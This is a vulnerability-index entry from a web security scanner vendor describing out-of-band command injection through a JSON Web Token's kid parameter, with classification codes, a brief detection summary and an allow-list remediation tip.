PCI v3.2-6.5.1
CAPEC-88
CWE-78
ISO27001-A.14.2.5
WASC-31
OWASP 2013-A1
OWASP 2017-A1
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

JWT kid Parameter Out of Band Command Injection

Severity:
Critical
Summary

Invicti detected an Out of Band Command Injection vulnerability inside the kid parameter of a JSON Web Token. It was detected by capturing a DNS A request, which occurs when input data is interpreted as an operating system command.

  • Use an allow-list of valid values and disallow any other input.
    • Impact
    Remediation
    Required Skills for Successful Exploitation
    Actions To Take
    Classifications
    PCI v3.2-6.5.1
    CAPEC-88
    CWE-78
    ISO27001-A.14.2.5
    WASC-31
    OWASP 2013-A1
    OWASP 2017-A1
    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Vulnerability Index

    You can search and find all vulnerabilities

    Select Category
    Critical
    High
    Medium
    Low
    Best Practice
    Information
    Select Vulnerability
    Thank you! Your submission has been received!
    Oops! Something went wrong while submitting the form.
    Related Vulnerabilities

    Featured resources

    No items found.
    No items found.
    View all resources

    Build your resistance to threats. And save hundreds of hours each month.

    Get a Demo